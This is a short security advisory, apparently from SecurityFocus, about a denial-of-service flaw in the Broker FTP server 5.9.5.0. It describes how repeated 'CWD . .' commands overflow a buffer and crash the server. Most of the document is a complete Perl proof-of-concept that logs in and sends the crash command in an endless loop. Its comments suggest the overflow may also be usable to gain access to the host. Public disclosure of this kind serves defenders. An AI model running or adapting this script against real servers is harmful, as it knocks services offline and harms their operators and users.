source: https://www.securityfocus.com/bid/2851/info
Broker is a Windows FTP server from TransSoft.
Versions of Broker are vulnerable to a denial of service.
A CD or CWD command, argumented by an invalid '. .' (dot-space-dot) sequence can, if repeatedly issued, create a buffer overflow causing the server to halt, requiring a restart.
The extent of this issue's exploitability is currently unverified.
#!/usr/bin/perl
# Broker FTP Server 5.9.5.0 DoS proof of concept
#
# Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd>
# Impact : eventually causes an access violation in the TSFTPSRV process
# the buffer overflow might be exploitable and be used to gain access
# to the FTP Server hostcomputer.
#
# by [ByteRage] <byterage@yahoo.com>
# www.byterage.cjb.net (http://elf.box.sk/byterage/)
use IO::Socket;
$loginid = "anonymous";
$loginpwd = "anonymous";
if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @ $host:";
if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n";
if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; }
if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; }
$SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush();
# get daemon banner
$reply = "";
sysread($SOCK, $reply, 2000);
print $reply;
# login
syswrite $SOCK, "USER $loginid\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
syswrite $SOCK, "PASS $loginpwd\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
sysread($SOCK, $reply, 2000);
print "$reply\nSending crash [";
if (substr($reply,0,1) == '2') {
# Login succesful, send CWD's
$i = 1; while ($i) {
$i = syswrite $SOCK, "CWD . .\015\012";
print ".";
sleep(1);
}
print "]\nSocket write failed... possible cause : Host down :(\n";
}
close($SOCK);
exit();
